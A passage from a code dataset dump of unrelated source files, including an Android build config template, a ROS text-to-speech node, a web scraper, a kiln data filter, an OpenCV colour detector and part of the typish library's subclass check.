34\n\n#11.检查Ip地址,如果为custom,注意配置Ip\n#ip setting begin\nCLOUD_IP = 'xuanxun.chinacloudapp.cn'\n\nTEST_IP = '120.132.147.140'\n\nOLD_ENTERIP1 = '211.147.238.57'\n\nOLD_ENTERIP2 = '211.155.27.54'\n\nOLD_SERVERIP = '211.147.238.68'\n\nCUSTOM_FUZAI_IP = None\n\nCUSTOM_SERVER_IP = None\n\nCUSTOM_ENTERPRICE_IP = None\n#ip setting end\n\n#12.检查apk中的企业缩写\n#enterprice name like 'hehuang'\nCLIENT_NAME = None\n\n#13.检查企业名称\n#enterprice name like u'娃哈哈'\nENTERPRICE_NAME = None\n\n#14.检查企业升级地址\n#enterpirce update url like 'http://211.155.27.212/soft/'\nUPDATE_URL = None\n\n#14.检查企业热线电话\n#enterprice phone like '10086'\nENTERPRICE_PHONE = None\n\n#15.检查服务热线描述是否要修改\n#enterprice phone call like '百度服务热线'\nENTERPRICE_NUM_TIPS = None\n\n#16.检查本次的代码存放地址\n#source url like 'D:/trunk/source'\nSOURCE_URL = 'D:/trunk/source/'\n\n\n\n\nimport os\n#self dir\nSELF_URL = os.getcwd() + '/Biuploy/_config/ant_config_default.py'\n#config template\nCONFIG_TMP = os.getcwd() + '/Biuploy/_src/ant_config_template.py'\n\n#setting the configs begin\nif BUILD_MODE == 'main':\n VERSION_NAME = 'XtionKX_A001_' + MAIN_VERSION + '.' + str(MAIN_RELEASE) + '.' + str(MAIN_BUILD)\n APK_NAME = 'xtion_' + MAIN_VERSION + '.' + str(MAIN_RELEASE) + '.apk'\n VERSION_NO = '6'\n BUILD_NO = MAIN_BUILD\n SVN_URL = 'http://192.168.1.245:9000/xtionkx/trunk/android/xtion'\nelif BUILD_MODE == 'client':\n VERSION_NAME = 'Android V' + MAIN_VERSION + ' ' + str(MAIN_BUILD) + '[' + str(CLIENT_VERSION) +']' + '[' + str(CLIENT_BUILD) + ']'\n APK_NAME = 'xtion_' + CLIENT_NAME + '_' + MAIN_VERSION + '.' + str(CLIENT_RELEASE) + '.apk'\n VERSION_NO = str(CLIENT_VERSION)\n BUILD_NO = CLIENT_BUILD\n SVN_URL = 'http://192.168.1.245:9000/xtionkx/branches/android/xtion5.2/xtion'\n#setting the configs end\n\n#main app url\nMAINAPP = SOURCE_URL + 'xtion/'\n\n#app dependencies\nDEPEND = ['actionbar_4.4/', 'asmack/', 'google_zxing/', 'XtionCamera/']\n\nDEPENDENCIES = [SOURCE_URL + x for x in DEPEND]\n\nfrom Biuploy._build.build import Ant\nBUILD_ENV = {\n 'MAINAPP' : MAINAPP,\n 'DEPEND' : DEPEND,\n 'DEPENDENCIES' : DEPENDENCIES,\n 'APK_NAME' : APK_NAME,\n 'BUILDTOOL' : Ant,\n}\n\n#setting the ip begin\nif DEPLOY_MODE == 'old' or DEPLOY_MODE == 'cloud':\n FUZAI = 'true'\n if DEPLOY_MODE == 'old':\n MULTISERVER = '0'\n ENTERIPSERVER1 = OLD_ENTERIP1\n ENTERIPSERVER2 = OLD_ENTERIP2\n SERVERIP = OLD_SERVERIP\n ENTERIP = OLD_SERVERIP \n else:\n MULTISERVER = '1'\n ENTERIPSERVER1 = CLOUD_IP\n ENTERIPSERVER2 = CLOUD_IP\n SERVERIP = CLOUD_IP\n ENTERIP = CLOUD_IP \nelif DEPLOY_MODE == 'test' or DEPLOY_MODE == 'custom':\n FUZAI = 'false'\n MULTISERVER = '1'\n if DEPLOY_MODE == 'test':\n ENTERIPSERVER1 = TEST_IP\n ENTERIPSERVER2 = TEST_IP\n SERVERIP = TEST_IP\n ENTERIP = TEST_IP\n else:\n ENTERIPSERVER1 = CUSTOM_FUZAI_IP\n ENTERIPSERVER2 = CUSTOM_FUZAI_IP\n SERVERIP = CUSTOM_SERVER_IP\n ENTERIP = CUSTOM_ENTERPRICE_IP\n#setting the ip end\n\n#config file begin\nfrom Biuploy.util import update_xml_file, update_normal_file, encode_file_to_utf8\n\nXML = update_xml_file\n\nNFILE = update_normal_file\n\nENCODE = encode_file_to_utf8\n\nCONFIG_FILE = [\n {\n 'NAME':'configs.xml',\n 'ADDR': MAINAPP + 'src/',\n 'FUNC': XML,\n 'ISNEED': True,\n 'MODPROP': 'value',\n 'PARAMS': {\n 'MULTI_SERVER': MULTISERVER,\n 'BUILDNO': str(BUILD_NO),\n 'VERSIONNO': str(VERSION_NO),\n 'camera_mode': None,\n 'DEL_FILE': None,\n 'isFuzai': FUZAI,\n 'is_open_xmpp': None,\n 'help_url': None,\n 'is_login_more': None,\n 'home_category': None,\n 'chat_func_isdisplay': None,\n 'custom_addressbook_fuc_isdisplay': None,\n 
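# --- editor's sketch ---
# The DEPLOY_MODE if/elif chain above maps one mode to six settings. The same
# mapping as a lookup table; reuses the IP constants defined earlier in this
# config (CUSTOM_* entries stay None exactly as in the source):
DEPLOY_TABLE = {
    # mode:   (fuzai,   multi, enter1,          enter2,          server,           enterprise)
    'old':    ('true',  '0',   OLD_ENTERIP1,    OLD_ENTERIP2,    OLD_SERVERIP,     OLD_SERVERIP),
    'cloud':  ('true',  '1',   CLOUD_IP,        CLOUD_IP,        CLOUD_IP,         CLOUD_IP),
    'test':   ('false', '1',   TEST_IP,         TEST_IP,         TEST_IP,          TEST_IP),
    'custom': ('false', '1',   CUSTOM_FUZAI_IP, CUSTOM_FUZAI_IP, CUSTOM_SERVER_IP, CUSTOM_ENTERPRICE_IP),
}
FUZAI, MULTISERVER, ENTERIPSERVER1, ENTERIPSERVER2, SERVERIP, ENTERIP = DEPLOY_TABLE[DEPLOY_MODE]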
'locate_service': None,\n 'locate_service_time': None,\n 'BESTENTERPRISESERVERS_IP': ENTERIPSERVER1,\n 'BESTENTERPRISESERVERS_IP_1': ENTERIPSERVER2,\n 'SERVER_IP': SERVERIP,\n 'ENTERPRICE_IP': ENTERIP,\n 'SERVER_PORT': None,\n 'ENTERPRICE_PORT': None,\n 'TARGET_UPLOAD_PORT': None,\n 'UPLOAD_PORT': None,\n 'TEST_PORT': None,\n 'PROXY_UP_TEST_PORT': None,\n 'BESTENTERPRISESERVERS_PORT': None,\n 'XWNUMBER': ENTERPRICE_PHONE,\n 'UPDATE_URL': UPDATE_URL,\n 'PACKGETIME': str(PACKGETIME),\n }\n },{\n 'NAME': 'strings.xml',\n 'ADDR': MAINAPP + 'res/values/',\n 'FUNC': XML,\n 'ISNEED': True,\n 'MODPROP': 'text',\n 'PARAMS': {\n 'app_name': ENTERPRICE_NAME,\n 'android_etion': ENTERPRICE_NAME,\n 'enterprise_num_tips': ENTERPRICE_NUM_TIPS,\n 'xw_number': ENTERPRICE_PHONE,\n }\n },{\n 'NAME': 'AndroidManifest.xml',\n 'ADDR': MAINAPP,\n 'FUNC': NFILE,\n 'ISNEED': True,\n 'BYRE': True,\n 'PARAMS': {\n r'(android:versionName=\".*?\")': 'android:versionName=\"'+VERSION_NAME+'\"',\n r'(android:versionCode=\".*?\")': 'android:versionCode=\"0\"',\n }\n },{\n 'NAME': 'Consts.java',\n 'ADDR': MAINAPP + 'src/com/xuanwu/xtion/config/',\n 'FUNC': NFILE,\n 'ISNEES': True,\n 'BYRE': True,\n 'PARAMS': {\n '(PACKGETIME = \".*?\")': 'PACKGETIME = \"'+str(PACKGETIME)+'\"',\n }\n },{\n 'FUNC': ENCODE,\n 'FILELIST': [\n SOURCE_URL + 'google_zxing/src/com/google/zxing/client/android/ViewfinderView.java',\n SOURCE_URL + 'google_zxing/src/com/google/zxing/client/android/CaptureActivity.java',\n SOURCE_URL + 'actionbar_4.4/src\\com/viewpagerindicator/LazyViewPager.java',\n SOURCE_URL + 'xtion/res/values/strings.xml',\n SOURCE_URL + 'xtion/src/com/xuanwu/xtion/config/Consts.java',\n SOURCE_URL + 'xtion/src/com/xuanwu/xtion/ui/base/SystemFragment.java',\n SOURCE_URL + 'xtion/src/com/xuanwu/xtion/ui/LoginActivity.java' \n ]\n\n }\n]\n#config file end\n\n#logo addr begin\nLOGO_SETTING = [{\n 'VERSION_NO' : VERSION_NO,\n 'CHANGELOGO' : True if BUILD_MODE == 'client' else False,\n 'DEST_LOGO_URL' : u'E:/configmanage/interprice_logo/',\n 'SOURCE_LOGO_URL' : MAINAPP + 'res/',\n},]\n#logo addr end\n\n#svn conf begin\nSVN_CONF = {\n 'RMV_FOLDER' : MAINAPP,\n 'DEST_URL' : SOURCE_URL,\n 'SVN_URL' : SVN_URL,\n 'SOURCE_VERSION' : SOURCE_VERSION,\n}\n#svn conf end","sub_path":"_src/ant_config_template.py","file_name":"ant_config_template.py","file_ext":"py","file_size_in_byte":8329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"96549648","text":"#!/usr/bin/env python\n\nfrom sound_play.libsoundplay import SoundClient\nfrom sound_play.msg import SoundRequest\nfrom std_msgs.msg import String\n\nimport rospy\n\nclass Speaker(object):\n def __init__(self, sound_handle, voice):\n self._sound_handle = sound_handle\n self._voice = voice \n \n def speak(self, msg):\n self._sound_handle.say(msg.data, self._voice)\n \ndef main():\n rospy.init_node('sound_play_tts')\n sound_handle = SoundClient()\n voice = 'voice_kal_diphone'\n speaker = Speaker(sound_handle, voice)\n rospy.Subscriber('text_to_speech', String, speaker.speak)\n \n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/tts_node.py","file_name":"tts_node.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"535451077","text":"class Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n result = nums[-1]\n for i in range(len(nums)-2, -1, -1):\n nums[i] = max(nums[i], nums[i] + nums[i+1])\n result = max(result, 
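# --- editor's sketch ---
# The maxSubArray solution above runs Kadane's scan right-to-left and reuses
# nums[] itself to hold the running suffix sums. The same O(n) time / O(1)
# space idea, left-to-right and without mutating the input:
def max_subarray(nums):
    best = cur = nums[0]
    for x in nums[1:]:
        cur = max(x, cur + x)   # extend the current run, or start over at x
        best = max(best, cur)
    return best

assert max_subarray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6   # subarray [4, -1, 2, 1]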
nums[i])\n return result\n\n#TC: O(n)\n#SC: O(1)\n","sub_path":"Array_4_2.py","file_name":"Array_4_2.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"468692104","text":"#!/usr/bin/env python\n\n'''\nThis basic example shows use of the Python Pillow library:\n\nsudo pip-3.2 install pillow # or sudo pip install pillow\n\nThe tiny 8x8 chars in lofi.png are from Oddball:\nhttp://forums.tigsource.com/index.php?topic=8834.0\n\nLicensed under Creative Commons Attribution-Noncommercial-Share Alike 3.0 Unported License.\n'''\n\nimport signal\nimport time\n\ntry:\n import numpy\nexcept ImportError:\n exit(\"This script requires the numpy module\\nInstall with: sudo pip install numpy\")\n\ntry:\n from PIL import Image\nexcept ImportError:\n exit(\"This script requires the pillow module\\nInstall with: sudo pip install pillow\")\n\nimport unicornhat as unicorn\n\nunicorn.set_layout(unicorn.AUTO)\nunicorn.rotation(0)\nunicorn.brightness(0.5)\n\nimg = Image.open('heart.png')\nprint(img)\n\nfor y in range(img.size[1]):\n for x in range(img.size[0]):\n pixel = img.getpixel((x,y))\n # print(pixel)\n r, g, b, a = int(pixel[0]),int(pixel[1]),int(pixel[2]), int(pixel[3])\n # r, g, b, a = 255, 255, 255, 255\n unicorn.set_pixel(x + 1, y, a, 0, 0)\n print(x, y, r, g, b, a)\nunicorn.show()\ntime.sleep(1.0)\n","sub_path":"heart.py","file_name":"heart.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433148750","text":"# 使用requests库获取猫眼电影前10热门,并保存为网页\n# Created by Xiaozhen Liu. Edited on 2020/06/28 09:59 UTC+\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\n\nheader = {'user-agent':user_agent}\n\nmyurl = 'https://maoyan.com/films?showType=3'\n\nresponse = requests.get(myurl,headers=header)\n\nfname = 'maoyan_response.html'\nwith open(fname, 'w',encoding='utf-8') as file_object:\n file_object.write(response.text)\n\nprint(f'返回码是: {response.status_code}')","sub_path":"week01/homework1-1/week1_requests.py","file_name":"week1_requests.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"460382438","text":"'''\n\n目前汤总的意思是这样的,我们只保留最为稳定的那类数据,\n不按照绝对值时间来删数据,按照比例来删,比如两次调整之间的时间是1个小时,那么我们只留中间20分钟的数据。\n如果两次调整的间隔时间小于1小时,就删掉这批数据。\n\n汤总还说进一步缩减数据变化,使用30秒间隔、1分钟间隔,5分钟间隔的数据分别试试看。\n30秒的看不出来,那就1分钟的数据,取一条,1分钟间隔就是1分钟取一条,5分钟取一条。取平均值吧\n\n一分钟内就60个数的平均这样\n所有的数值只要是数值类型 我就平均下\n\n'''\nimport csv\nfrom datetime import datetime, timedelta\n\n\ntarge_filename = \"HBYC_Line2_Kiln_2021_Jan_12_28.csv\"\n\npath = \"HXData/\" + targe_filename\n\n#实际处理 注释掉这行\n# path = \"HXDataSample/\" + targe_filename\n\nnewpath = \"HXProcessedData/\" + targe_filename\ndelpath = \"HXDelete/\" + targe_filename\nbufsize = 65536*6*5\n#实际处理 注释掉这行\n# bufsize = 5000\n\n#窑味料量\n# Feeding_index = 28\n\n# 本次只考虑使用头煤 HeadCoal_index\nHeadCoal_index = 29\n\ndef process(lines):\n time_need_removed = []\n rows = []\n del_rows = []\n for i in range(0, len(lines)):\n\n items = lines[i].split(',')\n if items[0] not in ('timestamp'):\n # d = datetime.strptime(items[0], \"%Y/%m/%d %H:%M:%S\")\n try:\n d = datetime.strptime(items[0], \"%Y/%m/%d %H:%M:%S\")\n except:\n d = datetime.strptime(items[0], \"%Y/%m/%d %H:%M\")\n del_flag = True\n for span in 
filter_spans:\n if d >= span[0] and d <= span[1]:\n rows.append(lines[i])\n del_flag = False\n if del_flag:\n del_rows.append(lines[i])\n return rows, del_rows\n \n\n\n\n\ntime_points_of_changes = []\nfilter_spans = []\n\ndef scan_for_change(lines):\n global time_change\n\n for i in range(0, len(lines)):\n\n # print(\"窑喂料量Kiln_Feed_SP=\", lines[i][28], 'Kiln_Burner_Coal_SP头煤=',lines[i][29])\n if i - 1 >= 0 and i + 1 < len(lines):\n # result = handleline(lines[i - 1], lines[i], lines[i + 1], lines[i + 2])\n items = lines[i].split(',')\n items_prev = lines[i-1].split(',')\n items_next = lines[i+1].split(',')\n if (items_prev[HeadCoal_index] not in ('Kiln_Burner_Coal_SP', '头煤') and \\\n items_prev[HeadCoal_index] != items[HeadCoal_index] and \\\n items_prev[HeadCoal_index] != items_next[HeadCoal_index]):\n if items[0] not in time_points_of_changes:\n time_points_of_changes.append(items[0])\n print(items[0], ' changes!')\n\ndef main():\n global filter_spans\n\n with open(path, encoding=\"UTF-8\") as infile:\n while True:\n lines = infile.readlines(bufsize)\n\n if not lines:\n break\n rows = scan_for_change(lines)\n print(len(time_points_of_changes), time_points_of_changes[0:10])\n\n small_delta = timedelta(\n days=0,\n seconds=0,\n microseconds=0,\n milliseconds=0,\n minutes=0,\n hours=1,\n weeks=0\n )\n # 找出想要保留的时间区间列表\n for i in range(0, len(time_points_of_changes)):\n if i + 1 < len(time_points_of_changes):\n try:\n d = datetime.strptime(time_points_of_changes[i], \"%Y/%m/%d %H:%M:%S\")\n except:\n d = datetime.strptime(time_points_of_changes[i], \"%Y/%m/%d %H:%M\")\n\n try:\n d_next = datetime.strptime(time_points_of_changes[i+1], \"%Y/%m/%d %H:%M:%S\")\n except:\n d_next = datetime.strptime(time_points_of_changes[i+1], \"%Y/%m/%d %H:%M\")\n # print(time_points_of_changes[i], time_points_of_changes[i+1])\n span = d_next - d\n print('#'*10, d, d_next)\n print(span, '@'*5, d+(span/3), d+(span*2/3))\n if span >= small_delta:\n filter_spans.append((d+(span/3), d+(span*2/3)))\n\n with open('i2filter_spans.txt', 'w') as filehandle:\n for listitem in filter_spans:\n filehandle.write(\"'{0}'#'{1}'\".format(listitem[0], listitem[1]))\n filehandle.write('\\n')\n\n print('\\n')\n # print(filter_spans[0][0], filter_spans[0][1])\n with open(path, encoding=\"UTF-8\") as infile:\n while True:\n lines = infile.readlines(bufsize)\n print('len(lines)=', len(lines))\n if not lines:\n break\n\n rows, delrows = process(lines)\n print('len(rows)=', len(rows), 'len(delrows)=', len(delrows))\n # print('process len(rows)=', len(rows), rows, '-'*10, '\\n')\n # for r in rows:\n # print(r, '#'*10, '\\n')\n with open(newpath, \"a\", newline='') as csvfile: \n writer = csv.writer(csvfile) \n\n # if write_count == 0:\n # writer.writerow(header)\n # write_count += 1\n for row in rows:\n writer.writerow(row.split(','))\n\n\n with open(delpath, \"a\", newline='') as dcsvfile: \n writer = csv.writer(dcsvfile) \n\n for drow in delrows:\n writer.writerow(drow.split(','))\nif __name__ == \"__main__\":\n main()\n","sub_path":"i2rm_jump_points.py","file_name":"i2rm_jump_points.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"141822006","text":"\nimport time,threading\n\nclass Singleton:\n __instance = None\n sleepTime = 1\n executeThread = False\n\n def __init__(self):\n if Singleton.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n Singleton.__instance = self\n\n @staticmethod\n def getInstance():\n 
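# --- editor's worked example of the span filter above ---
# Between two consecutive setpoint changes d and d_next, the script keeps only
# the middle third [d + span/3, d + 2*span/3], and only when the whole span is
# at least one hour (matching the "keep 20 minutes out of each hour" note):
from datetime import datetime, timedelta

d      = datetime(2021, 1, 12, 8, 0, 0)
d_next = datetime(2021, 1, 12, 9, 30, 0)
span   = d_next - d                           # 1:30:00, passes the 1 h minimum
keep   = (d + span / 3, d + span * 2 / 3)     # (08:30:00, 09:00:00)
assert span >= timedelta(hours=1)
assert keep == (datetime(2021, 1, 12, 8, 30), datetime(2021, 1, 12, 9, 0))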
if Singleton.__instance == None:\n Singleton()\n return Singleton.__instance\n\n\n def startThread(self):\n self.executeThread = True\n self.threadNew = threading.Thread(target=self.foo_target)\n self.threadNew.start()\n print('doing other things...')\n\n\n def stopThread(self):\n print(\"Killing Thread \", self)\n print(self.threadNew)\n self.executeThread = False\n self.threadNew.join()\n\n def foo(self):\n print(\"Hello in \" + str(self.sleepTime) + \" seconds\")\n\n def foo_target(self):\n while self.executeThread:\n self.foo()\n print(self.threadNew)\n time.sleep(self.sleepTime)\n\n if self.executeThread == False:\n break\n\n\n\n\nsClass = Singleton()\nsClass.startThread()\ntime.sleep(5)\nsClass.getInstance().stopThread()\n\nsClass.getInstance().sleepTime = 2\nsClass.startThread()\n\n# sClass.getInstance().sleepTime = 2\n# time.sleep(5)\n\n# time.sleep(5)\n# sClass.getInstance().sleepTime = 3\n# sClass.foo()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"SignletonThread.py","file_name":"SignletonThread.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"177501419","text":"#\n# Use k-means clustering to find the most-common colors in an image\n#\nimport cv2, time\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n# Class definition\ndef make_histogram(cluster):\n \"\"\"\n Count the number of pixels in each cluster\n :param: KMeans cluster\n :return: numpy histogram\n \"\"\"\n numLabels = np.arange(0, len(np.unique(cluster.labels_)) + 1)\n hist, _ = np.histogram(cluster.labels_, bins=numLabels)\n hist = hist.astype('float32')\n hist /= hist.sum()\n return hist\n\n\ndef make_bar(height, width, color):\n \"\"\"\n Create an image of a given color\n :param: height of the image\n :param: width of the image\n :param: BGR pixel values of the color\n :return: tuple of bar, rgb values, and hsv values\n \"\"\"\n bar = np.zeros((height, width, 3), np.uint8)\n bar[:] = color\n red, green, blue = int(color[2]), int(color[1]), int(color[0])\n hsv_bar = cv2.cvtColor(bar, cv2.COLOR_BGR2HSV)\n hue, sat, val = hsv_bar[0][0]\n return bar, (red, green, blue), (hue, sat, val)\n\n\ndef sort_hsvs(hsv_list):\n \"\"\"\n Sort the list of HSV values\n :param hsv_list: List of HSV tuples\n :return: List of indexes, sorted by hue, then saturation, then value\n \"\"\"\n bars_with_indexes = []\n for index, hsv_val in enumerate(hsv_list):\n bars_with_indexes.append((index, hsv_val[0], hsv_val[1], hsv_val[2]))\n bars_with_indexes.sort(key=lambda elem: (elem[1], elem[2], elem[3]))\n return [item[0] for item in bars_with_indexes]\n\ndef find_color(hsv_val):\n \"\"\"\n Translate the HSV values to a color if it fits in a specific color range\n :param hsv_val: The HSV values\n :return: The color that the HSV value translates to.\n \"\"\"\n H = hsv_val[0]\n S = hsv_val[1]\n V = hsv_val[2]\n color = None\n \n if V<=10: color = \"Black\"\n #elif S<=10:\n # if V>30 and V<=80: color = \"Gray\"\n # elif V>=70 and V<=100: color = \"White\"\n elif H<10:\n if S>30 and V>50: color = \"Red\"\n #else: color = \"White\"\n elif H>=10 and H<30:\n if H>=20 and H<30:\n if S>=10: color = \"Orange\"\n if S>=10 and S<20:\n if V>=50: color = \"Brown\"\n elif S>60 and S<=70: color = \"Orange\"\n elif S>=40:\n if V>=40 and V<=70: color = \"Brown\"\n else: color = \"Orange\"\n elif H>=30 and H<=50:\n if S<=20 and V<=60: color = \"Gray\"\n elif S>=30 and V>=50: color = \"Brown\"\n if S>15:\n if V>60: color = \"White\"\n if S>= 80:\n if V >= 90: color = 
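# --- editor's sketch ---
# The Singleton above raises from __init__ and gates access behind
# getInstance(). An equivalent, shorter pattern overrides __new__ so every
# construction returns the same object (note: like the original, this is not
# thread-safe without a lock around the first construction):
class Singleton2:
    _instance = None

    def __new__(cls, *args, **kwargs):
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance

assert Singleton2() is Singleton2()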
\"Orange\"\n elif V <= 80: color = \"Brown\"\n elif S>=40 and S<=60:\n if V>=80: color = \"Purple\"\n else:\n if V>=70: color = \"White\"\n elif H>50 and H<=60:\n if S <= 20:\n if V>=20 and V<90: color = \"Gray\"\n elif V>=90: color = \"White\"\n if S>=50:\n if V>=50 and V<90: color = \"Yellow\"\n elif V>=90: color = \"White\"\n #skipping H between 60 and 100, colors look like grass\n elif H>=100 and H<=150:\n if S>50 and V>50: color = \"Green\"\n elif H>160 and H<200:\n if S>=25 and V>=30: color = \"Blue\"\n else: color = \"Gray\"\n elif H>=200 and H<=250:\n if S<=10:\n if V>=70: color = \"White\"\n if S>=30:\n if V>=30: color = \"Blue\"\n elif H>250 and H<=340:\n if S>=15:\n if V>=30: color = \"Purple\"\n elif S>=20: color = \"Brown\"\n elif H>340 and H<=360:\n if S>=20 and V>=50: color = \"Red\"\n return color\n\n# Main code starts here\ndef main(filename):\n #reads image and gets image pixel shape\n \n #filename = directory + '\\DSC_' + str(index) + '.jpg'\n# filename = r'C:\\Users\\UHDT\\Pictures\\Test Targets' + '/DSC_0' + str(index) + '.jpg'\n img = cv2.imread(filename)\n height, width, _ = np.shape(img)\n\n #Crops images to get the center plus and minus 25 pixels from center\n width_center = width/2\n height_center = height/2\n\n# if(shape == \"star\"):\n# startingX = int(width_center -60)\n# startingY = int(height_center - 60)\n# endingX = int(width_center + 60)\n# endingY = int(height_center + 60)\n# elif(shape == \"cross\"):\n# startingX = int(width_center -50)\n# startingY = int(height_center - 50)\n# endingX = int(width_center + 50)\n# endingY = int(height_center + 50)\n\n startingX = int(width_center - 60)\n startingY = int(height_center - 65)\n\n endingX = int(width_center + 60)\n endingY = int(height_center + 60)\n\n crop_img = img[startingX:endingX, startingY:endingY]\n\n\n #Shows cropped image\n #cv2.imshow('crop_img', crop_img)\n\n # reshape the image to be a simple list of RGB pixels\n image = crop_img.reshape((-1, 3))\n\n # Gets the two most dominant colors\n num_clusters = 2\n clusters = KMeans(n_clusters=num_clusters)\n clusters.fit(image)\n\n # count the dominant colors and put them in \"buckets\"\n histogram = make_histogram(clusters)\n # then sort them, most-common first\n combined = zip(histogram, clusters.cluster_centers_)\n combined = sorted(combined, key=lambda x: x[0], reverse=True)\n\n #sprint(*combined)\n # finally, we'll output a graphic showing the colors in order\n bars = []\n hsv_values = []\n rgb_values = []\n for index, rows in enumerate(combined):\n bar, rgb, hsv = make_bar(100, 100, rows[1])\n\n #prints RGB values\n # print(f'Bar {index + 1}')\n # print(f' RGB values: {rgb}')\n #print(hsv)\n # print(*rgb)\n #HSV values then need to be multiplied by (2, 1/2.55, 1/2.55)\n # print(*hsv)\n # print(f' HSV values: {hsv}')\n hsv_values.append(hsv)\n bars.append(bar)\n\n #print(hsv_values[0])\n #print(hsv_values[1])\n\n #Gets the color for the shape color\n dominant_color = [0] * 3\n dominant_color[0] = hsv_values[0][0] * 2\n dominant_color[1] = hsv_values[0][1] / 2.55\n dominant_color[2] = hsv_values[0][2] / 2.55\n print(dominant_color)\n shape_color = find_color(dominant_color)\n print(\"Primary color = \",shape_color)\n\n #Gets the color of alpahnumeric color\n secondary_color = [0] * 3\n secondary_color[0] = hsv_values[1][0] * 2\n secondary_color[1] = hsv_values[1][1] / 2.55\n secondary_color[2] = hsv_values[1][2] / 2.55\n print(secondary_color)\n alpha_color = find_color(secondary_color)\n print(\"Secondary color = \", alpha_color)\n\n\n # sort the 
bars[] list so that we can show the colored boxes sorted\n # by their HSV values -- sort by hue, then saturation\n sorted_bar_indexes = sort_hsvs(hsv_values)\n sorted_bars = [bars[idx] for idx in sorted_bar_indexes]\n\n #cv2.imshow('Sorted by HSV values', np.hstack(sorted_bars))\n #cv2.imshow(f'{num_clusters} Most Common Colors', np.hstack(bars))\n #cv2.waitKey(0)\n print(\"\\n\")\n \n colors = {\n \"shape_color\": shape_color,\n \"alphanumeric_color\": alpha_color\n }\n\n return colors\n\n#start and ending indices\n# start = 3358\n# end = 3367\n\n# #change directory accordingly\n# directory = r\"C:\\Users\\UHDT\\Pictures\\Test Targets\"\n# main(3358, directory)\n#while(start <= end):\n# main(start, directory)\n# start += 1\n\n#while start <= end:\n# if(start < 10): index = \"00\" + str(start)\n# elif(start < 100): index = \"0\" + str(start)\n# else: index = str(start)\n# main(index, directory)\n# start += 1","sub_path":"detection_scripts/openCVcolor1.py","file_name":"openCVcolor1.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"375515522","text":"import typing\n\nfrom typish._types import Unknown\n\n\ndef subclass_of(cls: type, *args: type) -> bool:\n \"\"\"\n Return whether ``cls`` is a subclass of all types in ``args`` while also\n considering generics.\n :param cls: the subject.\n :param args: the super types.\n :return: True if ``cls`` is a subclass of all types in ``args`` while also\n considering generics.\n \"\"\"\n from typish.classes._literal import LiteralAlias\n\n if args and issubclass(args[0], LiteralAlias):\n return _check_literal(cls, subclass_of, *args)\n\n if len(args) > 1:\n result = subclass_of(cls, args[0]) and subclass_of(cls, *args[1:])\n else:\n if args[0] == cls:\n return True\n result = _subclass_of(cls, args[0])\n return result\n\n\ndef _subclass_of(cls: type, clsinfo: type) -> bool:\n from typish.functions._get_origin import get_origin\n from typish.functions._get_args import get_args\n\n # Check whether cls is a subtype of clsinfo.\n clsinfo_origin = get_origin(clsinfo)\n clsinfo_args = get_args(clsinfo)\n cls_origin = get_origin(cls)\n if cls is Unknown or clsinfo in (typing.Any, object):\n result = True\n elif cls_origin is typing.Union:\n # cls is a Union; all options of that Union must subclass clsinfo.\n cls_args = get_args(cls)\n result = all([subclass_of(elem, clsinfo) for elem in cls_args])\n elif clsinfo_args:\n result = _subclass_of_generic(cls, clsinfo_origin, clsinfo_args)\n else:\n try:\n result = issubclass(cls_origin, clsinfo_origin)\n except TypeError:\n result = False\n return result\n\n\ndef _subclass_of_union(\n cls: type,\n info_args: typing.Tuple[type, ...]) -> bool:\n # Handle subclass_of(*, union)\n result = True\n for cls_ in info_args:\n if subclass_of(cls, cls_):\n break\n else:\n result = False\n return result\n\n\ndef _subclass_of_generic(\n cls: type,\n info_generic_type: type,\n info_args: typing.Tuple[type, ...]) -> bool:\n # Check if cls is a subtype of info_generic_type, knowing that the latter\n # is a generic type.\n\n from typish.functions._get_origin import get_origin\n from typish.functions._get_args import get_args\n\n result = False\n\n cls_origin = get_origin(cls)\n cls_args = get_args(cls)\n if info_generic_type is tuple:\n # Special case.\n result = (subclass_of(cls_origin, tuple)\n and _subclass_of_tuple(cls_args, info_args))\n elif cls_origin is tuple and info_generic_type is typing.Iterable:\n # Another special 
case.\n args = cls_args\n if len(args) > 1 and args[1] is ...:\n args = [args[0]]\n\n # Match the number of arguments of info to that of cls.\n matched_info_args = info_args * len(args)\n result = _subclass_of_tuple(args, matched_info_args)\n elif info_generic_type is typing.Union:\n # Another special case.\n result = _subclass_of_union(cls, info_args)\n elif (subclass_of(cls_origin, info_generic_type) and cls_args\n and len(cls_args) == len(info_args)):\n for tup in zip(cls_args, info_args):\n if not subclass_of(*tup):\n result = False\n break\n else:\n result = True\n # Note that issubtype(list, List[...]) is always False.\n # Note that the number of arguments must be equal.\n return result\n\n\ndef _subclass_of_tuple(\n cls_args: typing.Tuple[type, ...],\n info_args: typing.Tuple[type, ...]) -> bool:\n from typish.functions._get_origin import get_origin\n from typish.functions._common_ancestor import common_ancestor_of_types\n\n result = False\n if len(info_args) == 2 and info_args[1] is ...:\n type_ = get_origin(info_args[0])\n if type_ is 